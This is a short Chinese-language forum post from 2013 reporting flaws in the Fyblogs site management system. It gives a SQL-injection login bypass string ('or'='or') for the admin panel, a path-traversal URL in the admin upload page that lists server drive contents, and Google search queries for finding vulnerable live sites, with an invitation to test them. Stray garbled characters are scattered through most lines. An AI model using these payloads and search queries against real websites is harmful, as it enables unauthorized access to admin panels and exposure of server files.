漏洞类型: 未授权访问/权限绕过
# h( }) |, f7 m/ F l" k% `: \( ~2 N6 V9 Y0 x( R8 {
简要描述:* G( w: ~5 }8 a! q& K0 q* b
* C& e: W9 E% X3 M& A/ t9 h, ?Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 X6 f) {/ r! _7 H9 y- z; P
' t& [# x! p; m: k详细说明:
' [& Z+ o1 U% n9 _. R: F9 k4 ]4 D7 S
后台万能密码 'or'='or'
8 j: d( A A+ `0 @# P* G3 P后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!0 B4 B. j9 Y# n2 U+ o( o
admin/uploadfile.asp?currentFolder=/upfiles/../: e$ P# X# a9 D$ D3 |( ^. Y' [ l( T
6 G$ ]1 E, V9 T0 D% N
漏洞证明:2 S5 {& U! p& o
3 @' j# m4 c+ q; J: r
谷歌:inurl:type.asp?id=1 新闻中心
: l. l2 N6 o3 ~或者 :inurl:download_ok.asp?; x/ b Y, V, ^9 p3 t8 K& c
& } D0 J. q1 t5 L) v$ b& o可以测试
4 m3 `8 l( Y- Y' O5 D
+ k9 K1 J* U1 e! W# Z; o
0 P; n3 L0 b0 c |
发表于 2013-3-7 13:07:46
收藏
支持
反对